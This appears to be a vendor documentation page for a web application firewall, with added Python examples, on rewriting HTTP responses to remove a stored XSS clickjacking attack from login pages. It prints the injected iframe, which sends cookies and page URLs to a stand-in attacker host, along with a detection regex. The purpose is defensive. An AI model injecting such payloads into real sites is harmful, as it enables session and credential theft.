Example: Sanitizing poisoned HTML
Example.com is a cloud hosting service provider that has just bought several FortiWeb appliances. Thousands of customers rely on it to maintain database-backed web servers. Before FortiWeb was added to its network, its web servers were regularly attacked. Without HTTP-savvy intrusion detection and filtering, malicious posts poisoned many of its web applications, using XSS to inject stored clickjacking attacks into login pages.
Example.com wants to mitigate the effects of prior attacks to protect innocent clients while its incident response team finishes forensic work to audit all applications for impact and complete remediation. To do this, it will rewrite the body of offending responses.
Example.com’s incident response team has already found some of the poisoned HTML that is afflicting some login pages. All major web browsers are currently vulnerable.
The poisoned HTML replaces the login pages of the web application with a hidden frame set, which the attacker uses to steal session or login cookies and spy on login attempts. The attacker can then use the stolen login credentials or the fraudulent session cookies. For bank clients, this is especially devastating: the attacker now has complete account access, including to credit cards.
To mitigate these effects, Example.com wants to scrub the malicious HTML from responses before they reach clients that could unwittingly participate in attacks or have their identities stolen.
To do this, FortiWeb will rewrite the injected attack:
<iframe src="javascript:document.location.href=
‘attacker.example.net/peep?url=‘+
parent.location.href.toString()+‘lulz=‘
escape(document.cookie);"
sandbox="allow-scripts allow-forms"
style="width:0%;height:0%;position:absolute;left:-9999em;">
</iframe>
into a null string to delete it from the infected web server’s response. FortiWeb will replace the attack with its own content:
<script src="http://irt.example.com/toDo.jss"></script>
so that each infected response posts the infected host name, URL, and attack permutation to a “to do” list for the incident response team, as well as notifying the impacted customer.
Since attackers often try new attack forms to evade filters, the regular expression uses a few techniques for flexible matching:
case insensitivity — (?i)
alternative quotation marks — ["'`?“”„?‚’‘'?‹›«»]
word breaks of zero or more white spaces — (\s)*
word breaks using forward slashes instead of white space — [\s\/]*
zero or more new line breaks within the tag — (\n|.)*
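The flexible matching techniques listed above can be tried in isolation. The following is a minimal sketch that uses Python's `re` module purely for illustration; it is not FortiWeb's regular expression engine, and behavior may differ in detail. The helper `matches` and the shortened quotation mark class are hypothetical and exist only for this example.

```python
import re

# Illustration only: Python's re module stands in for the appliance's engine.

# Case insensitivity: (?i) lets "IFRAME" or "iFrame" match "iframe".
case_insensitive = re.compile(r"(?i)<iframe")

# Alternative quotation marks: a character class accepts any one listed quote.
# This is a shortened, hypothetical subset of the class used in the example.
any_quote = re.compile(r"""src=["'`“”‘’]""")

# Word breaks of zero or more white spaces.
optional_space = re.compile(r"<(\s)*iframe")

# Word breaks using forward slashes instead of white space.
space_or_slash = re.compile(r"iframe[\s\/]*src")

# Zero or more characters, new lines included, up to the closing tag.
across_lines = re.compile(r"javascript:(\n|.)*</iframe>")

# For contrast: a plain dot does not match a new line by default.
dot_only = re.compile(r"javascript:.*</iframe>")


def matches(pattern, text):
    """Return True if the pattern occurs anywhere in the text."""
    return pattern.search(text) is not None
```

For instance, `matches(space_or_slash, "iframe/src")` and `matches(optional_space, "< \n iframe")` both return `True`, while `matches(dot_only, "javascript:a\nb\n</iframe>")` returns `False` because the attack spans several lines.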
Table 43: Example HTML body rewrite using regular expressions
HTTP Body
Regular Expression in URL match condition: (?i)<(\s)*iframe[\s\/]*src=(\s)*["'`?“”„?‚’‘'?‹›«»]javascript:(\n|.)*</iframe>
Replacement: <script src="http://irt.example.com/toDo.jss"></script>
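To see the effect of the rewrite outside the appliance, the expression and replacement from the table can be applied to a sample response body. This is a rough sketch in Python, not a reproduction of how FortiWeb processes responses. The sample body, the function name `sanitize`, and the constant names are assumptions made for illustration, and the replacement is written with a closing quotation mark on the `src` attribute.

```python
import re

# Expression as printed in the table, compiled with Python's re module.
# Assumption: Python's engine is close enough to illustrate the behavior.
PATTERN = re.compile(
    r"""(?i)<(\s)*iframe[\s\/]*src=(\s)*["'`?“”„?‚’‘'?‹›«»]javascript:(\n|.)*</iframe>"""
)

# Replacement content, with the src attribute quoted on both sides.
REPLACEMENT = '<script src="http://irt.example.com/toDo.jss"></script>'

# Hypothetical poisoned login page, shortened from the attack shown earlier.
POISONED_BODY = """<html><body>
<form action="/login" method="post"><input name="user"></form>
<IFRAME src="javascript:document.location.href='attacker.example.net/peep'"
style="width:0%;height:0%;">
</iframe>
</body></html>"""


def sanitize(body):
    """Replace any matching injected frame with the replacement content."""
    # A function is used as the replacement so the text is inserted literally.
    return PATTERN.sub(lambda _match: REPLACEMENT, body)


cleaned = sanitize(POISONED_BODY)
print(cleaned)
```

In this sketch the login form is left intact and the injected frame is swapped for the script tag. Note that `(\n|.)*` is greedy: in Python, the match runs to the last `</iframe>` in the body, so a legitimate frame that appears after the injected one would be replaced along with it. Whether that trade-off is acceptable depends on the application being protected.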
See also
Defining custom data leak & attack signatures
Regular expression syntax
What are back-references?
Cookbook regular expressions